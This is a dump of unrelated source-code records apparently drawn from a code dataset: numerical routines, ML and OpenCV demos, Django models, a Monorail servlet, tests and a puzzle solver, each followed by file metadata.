eigen dengan algoritma simultaneous power iteration\n m, n = M.shape\n # mengisi Q dengan nilai random\n Q = np.random.rand(m,m)\n # Dekomposisi QR\n Q, R = np.linalg.qr(Q)\n prevQ = Q\n # Iterasi hingga error cukup kecil\n for i in range(200):\n Temp = np.dot(M,Q)\n Q, R = np.linalg.qr(Temp)\n error = ((Q - prevQ) ** 2).sum()\n prevQ = Q\n if error < 0.001:\n break\n e_val = np.diag(R)\n e_vec = Q\n return e_val, e_vec\n","sub_path":"src/vektor.py","file_name":"vektor.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165627536","text":"from bsread import source\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom datetime import datetime\n# For PSEN Alvra\n\nCamera_image = 'SARES11-SPEC125-M2:FPICTURE'\nROI_background = 'SARES11-SPEC125-M2.roi_background_x_profile'\nROI_signal = 'SARES11-SPEC125-M2.roi_signal_x_profile'\nproc_para ='SARES11-SPEC125-M2.processing_parameters'\n\nChannels = [Camera_image, ROI_background, ROI_signal, proc_para]\nwith source(channels=Channels) as stream:\n message = stream.receive()\n\nexec('ProcPara='+message.data.data[proc_para].value)\nimgShape =message.data.data[Camera_image].value.shape\n\nplt.figure(figsize = [15,10])\nplt.subplot(311)\nplt.imshow(message.data.data[Camera_image].value)\nplt.title(Camera_image+', pulse ID '+str(message.data.pulse_id)+'\\n '+str(datetime.fromtimestamp(message.data.global_timestamp)))\nAxis = plt.gca()\nAxis.add_patch(Rectangle((ProcPara['roi_signal'][0],ProcPara['roi_signal'][2]),ProcPara['roi_signal'][1],ProcPara['roi_signal'][3], edgecolor = 'r', fill = False, linewidth = 3))\nAxis.add_patch(Rectangle((ProcPara['roi_background'][0],ProcPara['roi_background'][2]),ProcPara['roi_background'][1],ProcPara['roi_background'][3], edgecolor = 'k', fill = False, linewidth = 3))\n\n\nplt.subplot(312)\nplt.plot(message.data.data[ROI_background].value, color = 'k')\nplt.title('ROI background:'+str(ProcPara['roi_background']))\nplt.grid(True)\nplt.subplot(313)\nplt.plot(message.data.data[ROI_signal].value, color = 'r')\nplt.grid(True)\nplt.title('ROI 
signal:'+str(ProcPara['roi_signal']))\nplt.show()\n","sub_path":"Alvra/SpectralEncoding/125M2_processing_alvra.py","file_name":"125M2_processing_alvra.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"45675408","text":"# K-Means Clustering : Silrouette 계수 확인\n\nfrom sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nimport numpy as np\nfrom matplotlib import cm\nfrom sklearn.metrics import silhouette_samples\n\n# 시험용 데이터 세트를 구성한다\nX, y = make_blobs(n_samples=150, n_features=2, centers=3, cluster_std=0.5, shuffle=True, random_state=0)\n\n# K-means 알고리즘으로 시험용 데이터를 3 그룹으로 분류한다 (k = 3)\nkm = KMeans(n_clusters=3, init='k-means++', n_init=10, max_iter=300, tol=1e-04, random_state=0)\nkm = km.fit(X)\ny_km = km.predict(X)\n\n# 분류 결과를 표시한다\nplt.figure(figsize=(6, 5))\nplt.scatter(X[y_km == 0, 0], X[y_km == 0, 1], s=100, c='green', marker='s', alpha=0.5, label='cluster 1')\nplt.scatter(X[y_km == 1, 0], X[y_km == 1, 1], s=100, c='orange', marker='o', alpha=0.5, label='cluster 2')\nplt.scatter(X[y_km == 2, 0], X[y_km == 2, 1], s=100, c='blue', marker='v', alpha=0.5, label='cluster 3')\nplt.scatter(km.cluster_centers_[:,0], km.cluster_centers_[:,1], s=250, marker='+', c='red', label='centroids')\nplt.legend()\nplt.grid()\nplt.ylabel('y')\nplt.xlabel('X')\nplt.show()\n\ntrc_silhouette = []\nfor i in range(2, 10):\n # K-means 알고리즘으로 시험용 데이터를 3 그룹으로 분류한다 (k = 3)\n km = KMeans(n_clusters=i, init='k-means++', n_init=10, max_iter=300, tol=1e-04, random_state=0)\n km = km.fit(X)\n y_km = km.predict(X)\n silhouette_vals = silhouette_samples(X, y_km, metric='euclidean')\n trc_silhouette.append(np.mean(silhouette_vals))\n\n# 실루엣 계수를 확인한다.\nplt.plot(np.arange(2, 10), trc_silhouette, marker='o')\nplt.show()","sub_path":"Multicampus/ML/day4/silhouette.py","file_name":"silhouette.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283773673","text":"import pytest\nfrom loqusdb.utils import (delete_family, load_family)\nfrom loqusdb.exceptions import CaseError\n\ndef test_delete_family(mongo_adapter):\n db = mongo_adapter.db\n \n case = {\n 'case_id': '1',\n 'vcf_path': 'path_to_vcf'\n }\n \n load_family(\n adapter=mongo_adapter,\n case_id=case['case_id'],\n vcf_path=case['vcf_path']\n )\n \n mongo_case = db.case.find_one()\n \n assert mongo_case['case_id'] == case['case_id']\n \n delete_family(\n adapter=mongo_adapter,\n family_id='1',\n )\n \n mongo_case = db.case.find_one()\n \n assert mongo_case == None\n\ndef test_delete_non_existing_family(mongo_adapter):\n db = mongo_adapter.db\n \n with pytest.raises(CaseError):\n delete_family(\n adapter=mongo_adapter,\n family_id='1',\n )\n","sub_path":"tests/utils/test_delete_family.py","file_name":"test_delete_family.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"245413207","text":"import logging\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('influx-trending')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('/var/log/influx-trending.log')\nfh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\nformatter = 
logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366736214","text":"import collections\n# KHANS - COUNTER VERISON\nclass Solution2:\n def canFinish(self, numCourses: int, prerequisites):\n \n # ONLY TRACKING THE NUMBER OF INCOMING EDGES - NOT SPECIFIC EDGES\n # ONLY TRACKING THE NUMBER OF INCOMING EDGES - NOT SPECIFIC EDGES\n incoming = collections.defaultdict(int)\n outgoing = collections.defaultdict(set)\n\n for course, preReq in prerequisites:\n incoming[course] +=1\n outgoing[preReq].add(course)\n\n # ADD ALL THE NODES WITH NO INCOMING EDGES\n stack = [node for node in range(numCourses) if not incoming[node]]\n topOrder = []\n\n\n # WHILE YOU STILL HAVE A NODE WITH NO INCOMING EDGES LEFT\n while stack:\n node = stack.pop()\n\n # WE HAVE COMPLETED THIS COURSE, ADD IT TO TOPORDER\n topOrder.append(node)\n\n #DECREMENT ONE OF THIS NODES PREREQS\n for neigh in outgoing[node]:\n incoming[neigh] -=1\n\n #If NO more PREREQS then add NEIGH to STACK\n if incoming[neigh] == 0:\n stack.append(neigh)\n\n # NO MORE PREREQS SO REMOVE FROM INCOMING OR \"PREREQ LIST\"\n incoming.pop(node)\n \n # If theres no nodes with incoming edges at the end we know no cycles\n return \"cycle\" if incoming else topOrder\n \nprint(Solution2().canFinish(11,[[1,0],[2,1],[3,2],[5,10]])) # [10, 5, 9, 8, 7, 6, 4, 0, 1, 2, 3]\n\n\n","sub_path":"Basic Algorithms/topSort/khans.py","file_name":"khans.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"422135247","text":"from django.db import models\n\n\n'''\n@author: WanLing (Liddy) Hsieh \nAssignment2 - http://127.0.0.1:8000/api/cards \nDescription - Add a many-to-one relationship, i.e., a Kanban card may have 0 or more\ntasks. Each task has the following fields:\n1. description: as a required string\n2. done: as a boolean value, with False as the default value\n'''\n# Create your models here.\nclass Card(models.Model):\n title = models.CharField(\n max_length=250,\n unique= True) #unique, required, not blank\n description = models.CharField(\n max_length=250,\n blank=True, #optional\n default='')\n status = models.CharField(\n max_length=250, #required\n choices=(\n ('to-do', 'To Do'),\n ('in-progress', 'In Progress'),\n ('done', 'Complete')\n )\n )\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return '{}: {} ({})'.format(\n self.id,\n self.title,\n self.get_status_display()\n )\n\n\nclass Task(models.Model):\n description = models.CharField(max_length=250)\n done = models.BooleanField(default=False)\n card = models.ForeignKey(\n Card,\n related_name='tasks',\n on_delete=models.CASCADE\n )\n\n class Meta:\n unique_together = ('card', 'description')","sub_path":"kanbanProject/kanban_Assign2/cards/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"116029321","text":"import cv2 as cv\nimport numpy as np\nimport random\n\nblank=np.zeros((500,500,3), dtype='uint8')\nim=cv.imread('pokeon.jpg')\nimg=cv.resize(cv.imread('pokeon.jpg'), (0,0), fx=0.2, fy=0.2,interpolation=cv.INTER_AREA)\n#cv.rectangle(blank,(0,0),(blank.shape[0]//3,blank.shape[1]//3),(34,47,132),thickness=-1)\n#cv.circle(blank,(blank.shape[0]//3,blank.shape[1]//3),30,(34,47,132),thickness=-1)\n\"\"\"\nim=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nblur=cv.GaussianBlur(img, (5,5), cv.BORDER_DEFAULT)#blurring an image,\nedge=cv.Canny(img, 125, 175)\ndilate=cv.dilate(edge,(7,7),iterations=3)\neroded=cv.erode(edge,(7,7), iterations=3)\ncv.imshow('Eroded_image',eroded)\ncv.imshow('Dilated_image',dilate)\n\"\"\"\n\ndef translate(img, x,y):\n TranslateMat=np.float32([[1,0,x],[0,1,y]])#takes a 2x3 translation matrix\n dim=(img.shape[1],img.shape[0])\n return cv.warpAffine(img,TranslateMat,dim)#transformational functions\n \ndef rotate(img,angle,rotPoint=None):\n width, height=img.shape[1], img.shape[0]\n dim=(width,height)\n if rotPoint==None:\n rotPoint=(img.shape[1]//2,img.shape[0]//2)\n rotateMat=cv.getRotationMatrix2D(rotPoint,angle,1.0) \n return cv.warpAffine(img,rotateMat,dim)\nx=0 \ny=0\ntheta=0\nwhile True:\n im2=translate(img,x,y)\n im2=rotate(img,theta) \n cv.imshow('translate&rotate_image',im2) \n x=x+random.randint(-1,1)\n y=y+random.randint(-1,1)\n theta=random.randint(0,360)\n if cv.waitKey(50) & 0xFF==ord('a'):\n break\n#cv.imshow('Edges',edge)\n#cv.imshow('clear_image',img)\n#cv.imshow('blurred_image', blur)\n#cv.waitKey(0)\ncv.destroyAllWindows()\n\n\"\"\"\nfliped=cv.flip(img,1)\ncv.imshow('Flip',fliped)\ncropped_image=img[100:400, 200:400]\ncv.imshow('Cropped',cropped_image)\n\"\"\"\ncv.waitKey(0)","sub_path":"opencvtut2.py","file_name":"opencvtut2.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"495088045","text":"'''http://www.reddit.com/r/dailyprogrammer/comments/1m71k9/091113_challenge_133_intermediate_chain_reaction/\n''' \n\nimport time\n\nmultilineInput = input('press ENTER to enter each line seperately.\\nCopy and paste the list of definitions and press ENTER to use multiline inputs.\\nAlso try sample for the sample output and !.\\n')\nif multilineInput == '':\n N,M=input().split() #number of 'element types' and grid size resp.\n N,M=int(N),int(M)\n eltInput = 
[input() for _ in range(N)] #list of element definitions\n\nelif multilineInput == '!':\n import random\n random.seed()\n\n M = random.randint(5,7)\n N = min(random.randint(M,M*M),26)\n directs = 'udlr'\n eltInput = [0 for _ in range(N)]\n #eltInput[0] = str(N) + ' ' + str(M) \n numbersInMxM = random.sample(range(M*M),N)\n coords = [str(x//M)+' '+str(x%M) for x in numbersInMxM]\n for i in range(N):\n radius = str(random.randint(M//4,M//2))\n eltInput[i] = coords[i] + ' ' + radius + ' ' + ''.join(random.sample(directs,random.randint(3,4)))\n print(str(N) + ' ' + str(M))\n print('\\n'.join(eltInput))\n\nelif multilineInput == 'sample':\n N,M = 4,5\n eltInput = ['0 0 5 udlr','4 0 5 ud','4 2 2 lr','2 3 3 udlr']\n print('\\n'.join(eltInput))\nelse:\n multilineInput = multilineInput.split('\\n')\n N,M = multilineInput[0].split()\n N,M = int(N), int(M)\n eltInput = [multilineInput[i+1] for i in range(N)]\n \n\n#legend: 0 - x, 2 - y coords, 4 - radius, udlr means can propogate up/down/left/right.\n\neltList = [[0 for _ in range(4)] for _ in range(N)]\nfor i in range(N):\n eltList[i][0],eltList[i][1],eltList[i][2],eltList[i][3] = eltInput[i].split()\n for j in range(3):\n eltList[i][j] = int(eltList[i][j])\n\neltFind = {} #this 'reverse searches' eltList, taking first two coords and outputting index\nfor i in range(N):\n eltFind[2**eltList[i][0]*3**eltList[i][1]] = i \n\nstep=0\n\neltList[0][3] += 'A' #make first element active; we take (A in elt) to mean that elt is active\n\ngrid = [[' ' for _ in range(M)]for _ in range(M)] #note that coords go grid[x][y]\noldGrid = [[' ' for _ in range(M)]for _ in range(M)] #to determine when to break out of while loop\nalph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\ndef displayGrid():\n print('step '+str(step)+':')\n output = ''\n for i in range(M): \n for j in range(M):\n output += grid[j][i]\n output += '\\n'\n print(output)\n time.sleep(1)\n\ntemp=0\nfor elt in eltList:\n grid[elt[0]][elt[1]] = alph[temp]\n temp+=1\n\ndisplayGrid()\n \nwhile N!=0:\n \n for i in range(M): #store grid in oldGrid for comparison later\n for j in range(M):\n oldGrid[i][j] = grid[i][j]\n \n for elt in eltList:\n if 'A' in elt[3]:\n if grid[elt[0]][elt[1]] in alph: #'x' it out if it isn't already; counts as a step\n grid[elt[0]][elt[1]] = 'x' # only affects first element, can be optimised\n elt[3] = elt[3].replace('A','D') #D for dead\n \n step+=1\n displayGrid()\n \n for i in range(1,elt[2]+1):#check for collisions\n if 'r' in elt[3] and elt[0]+i in range(0,M) and grid[elt[0]+i][elt[1]] in alph:\n grid[elt[0]+i][elt[1]] = 'x'\n eltList[eltFind[2**(elt[0]+i)*3**elt[1]]][3] += 'B'\n elt[3] = elt[3].replace('A','D') #unsure if this line speeds up program\n \n if 'l' in elt[3] and elt[0]-i in range(0,M) and grid[elt[0]-i][elt[1]] in alph:\n grid[elt[0]-i][elt[1]] = 'x'\n eltList[eltFind[2**(elt[0]-i)*3**elt[1]]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n if 'd' in elt[3] and elt[1]+i in range(0,M) and grid[elt[0]][elt[1]+i] in alph: \n grid[elt[0]][elt[1]+i] = 'x'\n eltList[eltFind[2**elt[0]*3**(elt[1]+i)]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n if 'u' in elt[3] and elt[1]-i in range(0,M) and grid[elt[0]][elt[1]-i] in alph:\n grid[elt[0]][elt[1]-i] = 'x'\n eltList[eltFind[2**elt[0]*3**(elt[1]-i)]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n\n if oldGrid == grid:\n break \n \n step+=1\n for elt in eltList:\n elt[3] = elt[3].replace('B','A')\n displayGrid()\n","sub_path":"09:13:13 #133 [intermediate] Chain Reaction Redone.py","file_name":"09:13:13 #133 [intermediate] 
Chain Reaction Redone.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"529685005","text":"from django.db import models\nfrom django.core.validators import MinValueValidator\n\n\n# Create your models here.\n\n\nclass Category(models.Model):\n # name of category (primary_key)\n name = models.CharField(\n 'name',\n primary_key=True,\n max_length=50,\n null=False,\n blank=False,\n )\n\n class Meta:\n verbose_name = 'Category'\n verbose_name_plural = 'Category'\n\n def __str__(self):\n return str(self.name)\n\n def __unicode__(self):\n return str(self)\n\n\nclass Product(models.Model):\n # name of product\n name = models.CharField(\n 'name',\n primary_key=True,\n max_length=50,\n null=False,\n blank=False,\n )\n\n # foreign key to product.Category model\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_NULL,\n null=True,\n related_name='category_content'\n\n )\n\n class Meta:\n verbose_name = 'Product'\n verbose_name_plural = 'Products'\n\n def __str__(self):\n return str(self.name)\n\n def __unicode__(self):\n return str(self)\n\n\nclass ProductCustomization(models.Model):\n # foreign key to product.Product\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n related_name='product_options'\n )\n\n # products options\n customizable = models.CharField(\n 'customizable',\n max_length=50,\n )\n\n # price\n price = models.PositiveSmallIntegerField(\n 'price',\n blank=False,\n null=False,\n validators=[MinValueValidator(1)]\n )\n\n # product is_available or not\n is_available = models.BooleanField(\n 'is_available',\n default=True\n )\n\n class Meta:\n unique_together = ('product', 'customizable')\n verbose_name = 'Product_customization'\n verbose_name_plural = 'Product_customization'\n\n def __str__(self):\n return str(self.product)\n\n def __unicode__(self):\n return str(self)\n","sub_path":"CoffeeShop/apps/restframework/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386378486","text":"# Copyright 2016 The Chromium Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file or at\n# https://developers.google.com/open-source/licenses/bsd\n\n\"\"\"A class to display a user group, including a paginated list of members.\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport logging\nimport time\n\nfrom third_party import ezt\n\nfrom framework import exceptions\nfrom framework import framework_helpers\nfrom framework import framework_views\nfrom framework import paginate\nfrom framework import permissions\nfrom framework import servlet\nfrom project import project_helpers\nfrom proto import usergroup_pb2\nfrom sitewide import group_helpers\nfrom sitewide import sitewide_views\n\nMEMBERS_PER_PAGE = 50\n\n\nclass GroupDetail(servlet.Servlet):\n \"\"\"The group detail page presents information about one user group.\"\"\"\n\n _PAGE_TEMPLATE = 'sitewide/group-detail-page.ezt'\n\n def AssertBasePermission(self, mr):\n \"\"\"Assert that the user has the permissions needed to view this page.\"\"\"\n super(GroupDetail, self).AssertBasePermission(mr)\n\n group_id = mr.viewed_user_auth.user_id\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, group_id)\n if not group_settings:\n return\n\n member_ids, owner_ids = self.services.usergroup.LookupAllMembers(\n mr.cnxn, [group_id])\n (owned_project_ids, membered_project_ids,\n contrib_project_ids) = self.services.project.GetUserRolesInAllProjects(\n mr.cnxn, mr.auth.effective_ids)\n project_ids = owned_project_ids.union(\n membered_project_ids).union(contrib_project_ids)\n if not permissions.CanViewGroupMembers(\n mr.perms, mr.auth.effective_ids, group_settings, member_ids[group_id],\n owner_ids[group_id], project_ids):\n raise permissions.PermissionException(\n 'User is not allowed to view a user group')\n\n def GatherPageData(self, mr):\n \"\"\"Build up a dictionary of data values to use when rendering the page.\"\"\"\n group_id = mr.viewed_user_auth.user_id\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, group_id)\n if not group_settings:\n raise exceptions.NoSuchGroupException()\n\n member_ids_dict, owner_ids_dict = (\n self.services.usergroup.LookupVisibleMembers(\n mr.cnxn, [group_id], mr.perms, mr.auth.effective_ids,\n self.services))\n member_ids = member_ids_dict[group_id]\n owner_ids = owner_ids_dict[group_id]\n member_pbs_dict = self.services.user.GetUsersByIDs(\n mr.cnxn, member_ids)\n owner_pbs_dict = self.services.user.GetUsersByIDs(\n mr.cnxn, owner_ids)\n member_dict = {}\n for user_id, user_pb in member_pbs_dict.items():\n member_view = group_helpers.GroupMemberView(user_pb, group_id, 'member')\n member_dict[user_id] = member_view\n owner_dict = {}\n for user_id, user_pb in owner_pbs_dict.items():\n member_view = group_helpers.GroupMemberView(user_pb, group_id, 'owner')\n owner_dict[user_id] = member_view\n\n member_user_views = []\n member_user_views.extend(\n sorted(list(owner_dict.values()), key=lambda u: u.email))\n member_user_views.extend(\n sorted(list(member_dict.values()), key=lambda u: u.email))\n\n group_view = sitewide_views.GroupView(\n mr.viewed_user_auth.email, len(member_ids), group_settings,\n mr.viewed_user_auth.user_id)\n url_params = [(name, mr.GetParam(name)) for name in\n framework_helpers.RECOGNIZED_PARAMS]\n pagination = paginate.ArtifactPagination(\n member_user_views, mr.GetPositiveIntParam('num', MEMBERS_PER_PAGE),\n 
mr.GetPositiveIntParam('start'), mr.project_name, group_view.detail_url,\n url_params=url_params)\n\n is_imported_group = bool(group_settings.ext_group_type)\n\n offer_membership_editing = permissions.CanEditGroup(\n mr.perms, mr.auth.effective_ids, owner_ids) and not is_imported_group\n\n group_type = 'Monorail user group'\n if group_settings.ext_group_type:\n group_type = str(group_settings.ext_group_type).capitalize()\n\n return {\n 'admin_tab_mode': self.ADMIN_TAB_META,\n 'offer_membership_editing': ezt.boolean(offer_membership_editing),\n 'initial_add_members': '',\n 'initially_expand_form': ezt.boolean(False),\n 'groupid': group_id,\n 'groupname': mr.viewed_username,\n 'settings': group_settings,\n 'group_type': group_type,\n 'pagination': pagination,\n }\n\n def ProcessFormData(self, mr, post_data):\n \"\"\"Process the posted form.\"\"\"\n _, owner_ids_dict = self.services.usergroup.LookupMembers(\n mr.cnxn, [mr.viewed_user_auth.user_id])\n owner_ids = owner_ids_dict[mr.viewed_user_auth.user_id]\n permit_edit = permissions.CanEditGroup(\n mr.perms, mr.auth.effective_ids, owner_ids)\n if not permit_edit:\n raise permissions.PermissionException(\n 'User is not permitted to edit group membership')\n\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, mr.viewed_user_auth.user_id)\n if bool(group_settings.ext_group_type):\n raise permissions.PermissionException(\n 'Imported groups are read-only')\n\n if 'addbtn' in post_data:\n return self.ProcessAddMembers(mr, post_data)\n elif 'removebtn' in post_data:\n return self.ProcessRemoveMembers(mr, post_data)\n\n def ProcessAddMembers(self, mr, post_data):\n \"\"\"Process the user's request to add members.\n\n Args:\n mr: common information parsed from the HTTP request.\n post_data: dictionary of form data.\n\n Returns:\n String URL to redirect the user to after processing.\n \"\"\"\n # 1. Gather data from the request.\n group_id = mr.viewed_user_auth.user_id\n add_members_str = post_data.get('addmembers')\n new_member_ids = project_helpers.ParseUsernames(\n mr.cnxn, self.services.user, add_members_str)\n role = post_data['role']\n\n # 2. Call services layer to save changes.\n if not mr.errors.AnyErrors():\n try:\n self.services.usergroup.UpdateMembers(\n mr.cnxn, group_id, new_member_ids, role)\n except exceptions.CircularGroupException:\n mr.errors.addmembers = (\n 'The members are already ancestors of current group.')\n\n # 3. Determine the next page in the UI flow.\n if mr.errors.AnyErrors():\n self.PleaseCorrect(\n mr, initial_add_members=add_members_str,\n initially_expand_form=ezt.boolean(True))\n else:\n return framework_helpers.FormatAbsoluteURL(\n mr, '/g/%s/' % mr.viewed_username, include_project=False,\n saved=1, ts=int(time.time()))\n\n def ProcessRemoveMembers(self, mr, post_data):\n \"\"\"Process the user's request to remove members.\n\n Args:\n mr: common information parsed from the HTTP request.\n post_data: dictionary of form data.\n\n Returns:\n String URL to redirect the user to after processing.\n \"\"\"\n # 1. Gather data from the request.\n remove_strs = post_data.getall('remove')\n logging.info('remove_strs = %r', remove_strs)\n\n if not remove_strs:\n mr.errors.remove = 'No users specified'\n\n # 2. Call services layer to save changes.\n if not mr.errors.AnyErrors():\n remove_ids = set(\n self.services.user.LookupUserIDs(mr.cnxn, remove_strs).values())\n self.services.usergroup.RemoveMembers(\n mr.cnxn, mr.viewed_user_auth.user_id, remove_ids)\n\n # 3. 
Determine the next page in the UI flow.\n if mr.errors.AnyErrors():\n self.PleaseCorrect(mr)\n else:\n return framework_helpers.FormatAbsoluteURL(\n mr, '/g/%s/' % mr.viewed_username, include_project=False,\n saved=1, ts=int(time.time()))\n","sub_path":"appengine/monorail/sitewide/groupdetail.py","file_name":"groupdetail.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556309564","text":"\r\nimport json\r\nfrom app import ErrorRun_impl, TypeError_system\r\nfrom app.com_data.any_mixin import getUser, Res_proc\r\n# from .serv_advuser import servAdvUser_get_advUser\r\n\r\n\r\nclass Com_proc_sprstatus:\r\n \"\"\" class содержащий сервис обработки атрибутов модели SprStatus \"\"\"\r\n\r\n\r\n\r\n\r\n _s_err = 'SyntaxError##advuser.serv_sprstatus.Com_proc_sprstatus'\r\n _s_err_user_notData = 'Пользователь User не определен'\r\n\r\n #процедура вызова ErrorRun_impl\r\n @classmethod\r\n def _run_raise(cls, s_arg, showMes=None, s_err=None):\r\n\r\n s_err = s_err or cls._s_err\r\n\r\n if showMes:\r\n raise ErrorRun_impl('verify##{0}'.format(s_arg))\r\n else:\r\n s_mes = '{0} {1}'.format(s_err, s_arg)\r\n TypeError_system(ErrorRun_impl(s_mes)) # запись в файл app/loggin/*.log\r\n raise ErrorRun_impl(s_mes)\r\n\r\n\r\n @classmethod\r\n def get_list_levelperm(cls)->Res_proc:\r\n \"\"\" Выборка значений status_id, levelperm по ВСЕМУ справочнику SprStatus\r\n return Res_proc.res_list = list( dict(lvperm=Number, status=str), ... )\r\n \"\"\"\r\n from .models import SprStatus\r\n\r\n res_proc = Res_proc()\r\n lst = []\r\n\r\n try:\r\n\r\n rows = SprStatus.objects.filter(levelperm__gte=10)\r\n if rows.exists():\r\n for row in rows:\r\n lst.append( dict(lvperm=row.levelperm, status=row.status) )\r\n\r\n res_proc.res_list = lst\r\n res_proc.res = True\r\n\r\n except Exception as ex:\r\n res_proc.error = ex\r\n\r\n return res_proc\r\n\r\n\r\n @classmethod\r\n def get_levelperm(cls, arg_statusID:str)->int:\r\n \"\"\" По значению arg_statusID выборка levelperm\r\n return val_levelperm or 0\r\n \"\"\"\r\n from .models import SprStatus\r\n\r\n res = 0\r\n\r\n try:\r\n\r\n row = SprStatus.objects.get(pk=arg_statusID)\r\n res = row.levelperm\r\n\r\n return res\r\n\r\n except:\r\n return 0\r\n\r\n\r\n\r\n # Процедура доступа к объекту cls.SprStatus\r\n \"\"\"\r\n testing: 19.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus\r\n file: tests/advuser/serv_sprstatus/test_sprstatus_serv.json\r\n -----------------------------------------------\r\n возвращает объект cls.SprStatus or None\r\n -----------------------------------------------\r\n username -> извлекается из kwages[username]\r\n ВСЕ параметры игнорируются\r\n извлекается row SprStatus for User\r\n ---------------------------------\r\n agr_status -> User, AdvUser, str==statusID\r\n \"\"\"\r\n @classmethod\r\n def getStatus_or_None(cls, arg_status=None, **kwargs):\r\n \"\"\"return obj_sprStatus_or_None\r\n username -> извлекается из kwages {username:data_username}\r\n ВСЕ параметры игнорируются\r\n извлекается row SprStatus for User\r\n ---------------------------------\r\n agr_status -> User, AdvUser, str==statusID \"\"\"\r\n\r\n def _get_status_or_None(arg_user):\r\n try:\r\n _user = getUser(arg_user)\r\n if _user is None:\r\n cls._run_raise(cls._s_err_user_notData)\r\n\r\n if _user.is_superuser:\r\n return cls._get_filter_obj('superuser')\r\n\r\n _advUser = _user.advuser\r\n\r\n return _advUser.status\r\n\r\n except Exception as ex :\r\n return 
None\r\n\r\n\r\n username = kwargs.get('username')\r\n statusID = kwargs.get('statusID')\r\n arg_status= arg_status or kwargs.get('arg_status')\r\n #-------------------------------------------------------\r\n\r\n if username: # Поиск по логину\r\n return _get_status_or_None(username)\r\n\r\n else:\r\n s_type = type(arg_status).__name__\r\n\r\n if s_type == 'User':\r\n return _get_status_or_None(arg_status)\r\n\r\n elif s_type == 'AdvUser':\r\n return arg_status.status\r\n\r\n else:\r\n\r\n if arg_status is None or s_type == 'str':\r\n s_param = arg_status or statusID\r\n if s_param :\r\n return cls._get_filter_obj(s_param)\r\n else:\r\n return None\r\n\r\n\r\n @classmethod\r\n def _get_filter_obj(cls, statusID):\r\n \"\"\" return obj_or_None Основная процедура доступа к атрибутам модели sprStatus \"\"\"\r\n\r\n from .models import SprStatus\r\n\r\n try:\r\n res = None\r\n\r\n if not isinstance(statusID, str):\r\n cls._run_raise('_get_filter_obj: Аргумент statusID не соответствие типа')\r\n\r\n filter = SprStatus.objects.filter(pk=statusID)\r\n if filter.exists():\r\n res = filter.first()\r\n\r\n else:\r\n cls._run_raise('_get_filter_obj: статус не определен: '+ statusID)\r\n\r\n return res\r\n\r\n except Exception as ex:\r\n return None\r\n\r\n\r\n \"\"\"Тестирование 19.05.2020.\r\n\r\n modul: prtests.tests.advuser.serv_sprstatus.test_serv_sprtatus\r\n file : tests/advuser/serv_sprstatus/test_sprstatus_serv.json\r\n ----------------------------------------------------------------------\r\n\r\n Возвращает res.res_obj == class PermModf_prof(...) в котором определены\r\n ВСЕ атрибуты привелегий\r\n ------------------------------------------------------\r\n Права на обработку профиля, указанный в arg_modf\r\n arg_modf -> строка формата: add_STATUS or upd_STATUS\r\n STATUS -> proj-memb, subheader и другие значени из SprStatus.pk\r\n из arg_modf извлекаются первые 3 символа -> идентификатор метода обработки\r\n\r\n arg_model -> str, int, User, AdvUser\r\n преобразование в STATUS\r\n из STATUS.any_option -> извлекаются ВСЕ необходимые данные\r\n --------------------------------------------------------------\r\n Возвращается объект res.res_obj = permMod_prof(arg_status)\r\n \"\"\"\r\n @classmethod\r\n def get_permModf_prof(cls, arg_model, arg_modf):\r\n \"\"\" return class PermModf_prof(...) 
